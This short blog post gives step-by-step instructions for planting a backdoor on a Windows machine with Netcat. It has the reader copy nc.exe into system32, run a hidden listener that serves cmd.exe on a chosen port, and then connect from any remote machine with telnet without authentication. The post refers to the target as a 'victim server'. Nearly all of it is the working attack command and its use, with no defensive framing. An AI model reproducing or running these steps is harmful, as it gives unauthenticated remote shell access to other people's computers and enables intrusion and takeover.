24
Jun
Jun
Create a Back Door on Microsoft Windows
Hello there! If you are new here, you might want to subscribe to the RSS feed for updates on this topic.
Netcat is referred to as the TCP/IP swiss army knife. Netcat can be used for good things, as well as bad. By using Netcat we can create a back door to any Windows machine with ease.
- Download the Windows version of Netcat.
- Unzip nc.exe to the %SYSTEMROOT%\system32 directory.
- Execute nc -d -L -e cmd.exe -p 10001. Change 10001 to which ever port you wish.
- From any remote machine accessible to the victim server — you can now telnet to the server on port 10001 — telnet X.X.X.X 10001 — without any authentication.
Related posts:

